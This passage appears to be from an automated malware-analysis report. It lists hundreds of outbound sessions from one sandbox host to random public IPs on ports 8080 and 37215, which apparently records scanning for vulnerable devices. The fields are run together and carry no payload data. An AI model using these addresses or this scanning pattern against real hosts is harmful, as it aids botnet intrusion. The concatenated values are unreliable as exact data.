                                                        15517192.168.2.2337652183.115.98.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15518192.168.2.23430661.248.65.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15519192.168.2.23482225.81.148.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15520192.168.2.2352024223.165.17.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15521192.168.2.2334310107.11.219.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15522192.168.2.2334414185.199.161.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15523192.168.2.235592246.55.169.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15524192.168.2.2353932145.146.180.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15525192.168.2.234287293.214.122.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15526192.168.2.233386885.190.19.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15527192.168.2.235565220.84.105.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15528192.168.2.2357658156.150.25.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15529192.168.2.2346646117.125.24.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15530192.168.2.2333248199.108.49.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15531192.168.2.234159431.197.240.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15532192.168.2.2333018114.88.170.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15533192.168.2.234397420.166.52.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15534192.168.2.234085847.127.151.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15535192.168.2.2340514152.35.121.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15536192.168.2.235196850.6.79.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15537192.168.2.2358784122.77.121.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15538192.168.2.233916498.240.59.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15539192.168.2.235248243.55.187.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15540192.168.2.234114852.107.39.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15541192.168.2.2345254158.141.247.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15542192.168.2.2337770193.236.116.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15543192.168.2.2356722194.159.226.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15544192.168.2.234838639.199.135.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15545192.168.2.235197266.213.2.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15546192.168.2.2337252145.70.92.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15547192.168.2.2348654209.230.106.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15548192.168.2.234455858.57.166.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15549192.168.2.2346914117.70.45.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15550192.168.2.235347836.114.214.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15551192.168.2.2332978174.53.109.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15552192.168.2.2356466138.25.104.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15553192.168.2.2332982104.210.27.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15554192.168.2.236034059.238.171.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15555192.168.2.2350564115.221.53.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15556192.168.2.235423490.230.97.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15557192.168.2.2342574211.72.26.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15558192.168.2.2342016130.111.65.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15559192.168.2.234905861.127.120.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15560192.168.2.2348182219.81.218.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15561192.168.2.233978288.206.22.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15562192.168.2.235492057.213.42.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15563192.168.2.2343044137.185.19.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15564192.168.2.2333362216.136.27.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15565192.168.2.2359362146.21.158.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15566192.168.2.2333864104.183.35.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15567192.168.2.235344051.140.113.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15568192.168.2.234967267.25.234.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15569192.168.2.2351666202.206.201.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15570192.168.2.234279677.133.170.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15571192.168.2.2352266145.250.220.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15572192.168.2.2354846137.183.60.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15573192.168.2.2354928150.121.158.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15574192.168.2.2349432170.9.75.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15575192.168.2.2338622219.238.42.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15576192.168.2.2334586176.91.155.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15577192.168.2.233990623.221.250.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15578192.168.2.2359398133.11.178.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15579192.168.2.2360224100.61.29.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15580192.168.2.2346278142.83.119.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15581192.168.2.234701292.188.210.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15582192.168.2.234702673.168.207.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15583192.168.2.2338028128.141.26.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15584192.168.2.2360224204.210.45.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15585192.168.2.234431898.103.223.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15586192.168.2.235801844.86.246.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15587192.168.2.2332770213.135.229.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15588192.168.2.2358742185.116.36.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15589192.168.2.2344908222.149.202.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15590192.168.2.2352734188.157.49.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15591192.168.2.233392669.156.182.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15592192.168.2.2350660195.225.54.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15593192.168.2.234877473.28.128.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15594192.168.2.2354056160.181.130.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15595192.168.2.235991451.152.242.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15596192.168.2.236086490.168.62.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15597192.168.2.233751299.213.121.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15598192.168.2.2350836165.49.202.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15599192.168.2.2337238196.216.67.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15600192.168.2.2338554212.187.58.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15601192.168.2.2356952122.84.233.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15602192.168.2.2338612135.41.114.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15603192.168.2.235544665.28.115.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15604192.168.2.2347002221.91.82.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15605192.168.2.2346742129.151.103.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15606192.168.2.2347776123.196.164.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15607192.168.2.2351846129.227.183.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15608192.168.2.2346804136.6.9.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15609192.168.2.2339410147.27.130.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15610192.168.2.23577249.61.182.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15611192.168.2.2351110151.185.201.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15612192.168.2.235478643.139.188.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15613192.168.2.2353142154.98.88.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15614192.168.2.235238867.177.166.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15615192.168.2.234652835.136.190.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15616192.168.2.2340652158.17.221.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15617192.168.2.2336934134.224.189.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15618192.168.2.2345360118.200.105.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15619192.168.2.2337876204.151.165.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15620192.168.2.2340938217.105.119.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15621192.168.2.2344328208.158.204.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15622192.168.2.2356540116.243.145.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15623192.168.2.2335004179.27.163.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15624192.168.2.2349252135.7.169.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15625192.168.2.2352160132.197.67.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15626192.168.2.2343598119.157.75.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15627192.168.2.2340002129.235.79.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15628192.168.2.2341932168.226.232.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15629192.168.2.235813827.125.227.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15630192.168.2.2349938165.20.151.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15631192.168.2.2344734133.100.228.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15632192.168.2.2360284190.88.151.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15633192.168.2.233426214.84.221.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15634192.168.2.235367839.228.4.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15635192.168.2.234900832.44.47.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15636192.168.2.2334538170.22.111.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15637192.168.2.2352444130.183.194.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15638192.168.2.2333954221.12.197.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15639192.168.2.234548051.63.40.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15640192.168.2.234726027.1.61.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15641192.168.2.2353790186.91.204.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15642192.168.2.23385902.92.80.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15643192.168.2.235694478.192.12.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15644192.168.2.2334404124.65.68.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15645192.168.2.2349292151.121.124.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15646192.168.2.2355564139.217.96.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15647192.168.2.234539836.148.94.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15648192.168.2.2353958133.61.45.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15649192.168.2.235148642.56.53.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15650192.168.2.2352306105.186.100.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15651192.168.2.235961625.226.11.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15652192.168.2.233732067.107.51.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15653192.168.2.235921484.164.71.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15654192.168.2.234212650.217.30.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15655192.168.2.233964620.151.140.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15656192.168.2.2333170146.190.157.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15657192.168.2.2332900157.130.148.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15658192.168.2.2359630162.226.204.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15659192.168.2.2358210197.159.168.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15660192.168.2.2345036157.69.255.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15661192.168.2.234314687.52.246.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15662192.168.2.2353822157.74.246.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15663192.168.2.234189241.165.55.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15664192.168.2.233278841.239.53.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15665192.168.2.2344974102.175.208.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15666192.168.2.2351232157.161.235.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15667192.168.2.233594841.4.11.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15668192.168.2.235790841.98.148.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15669192.168.2.2348254157.235.137.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15670192.168.2.233701241.145.211.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15671192.168.2.2356534197.100.196.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15672192.168.2.2354854197.85.40.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15673192.168.2.234209041.117.44.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15674192.168.2.235561441.32.119.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15675192.168.2.233769641.83.159.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15676192.168.2.2338862157.142.246.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15677192.168.2.2357972197.149.49.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15678192.168.2.2340554157.206.117.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15679192.168.2.234887679.129.198.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15680192.168.2.233644441.217.21.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15681192.168.2.2346960157.86.29.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15682192.168.2.235804841.162.123.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15683192.168.2.2357800197.0.91.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15684192.168.2.2347184170.167.55.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15685192.168.2.235482241.5.198.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15686192.168.2.2337280157.131.205.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15687192.168.2.2352450157.74.143.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15688192.168.2.2357354197.46.173.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15689192.168.2.233904025.71.226.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15690192.168.2.2341320197.21.240.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15691192.168.2.2356046197.211.83.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15692192.168.2.2356440157.218.190.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15693192.168.2.2350602197.181.251.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15694192.168.2.2359722197.60.154.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15695192.168.2.2347062157.127.78.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15696192.168.2.2341098157.67.168.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15697192.168.2.2353196197.156.253.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15698192.168.2.2360678197.193.75.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15699192.168.2.2355764157.39.2.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15700192.168.2.2353206197.23.67.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15701192.168.2.2351842157.160.107.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15702192.168.2.2338900197.17.156.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15703192.168.2.2357418157.124.15.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15704192.168.2.2338806178.158.67.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15705192.168.2.234299441.10.42.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15706192.168.2.2358462197.221.4.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15707192.168.2.233714641.40.80.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15708192.168.2.2349146197.202.151.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15709192.168.2.234705241.78.129.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15710192.168.2.2348902213.44.4.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15711192.168.2.2332840157.103.96.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15712192.168.2.2352188197.108.99.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15713192.168.2.2351236197.144.200.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15714192.168.2.234036641.76.34.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15715192.168.2.2351982157.29.100.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15716192.168.2.2333758197.183.239.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15717192.168.2.2339396157.11.145.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15718192.168.2.2347574197.243.77.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15719192.168.2.234616441.25.254.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15720192.168.2.2348806157.58.87.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15721192.168.2.2355128114.151.232.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15722192.168.2.235881841.108.232.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15723192.168.2.2351440104.227.60.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15724192.168.2.234745641.104.228.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15725192.168.2.2351264157.51.27.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15726192.168.2.235227641.148.135.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
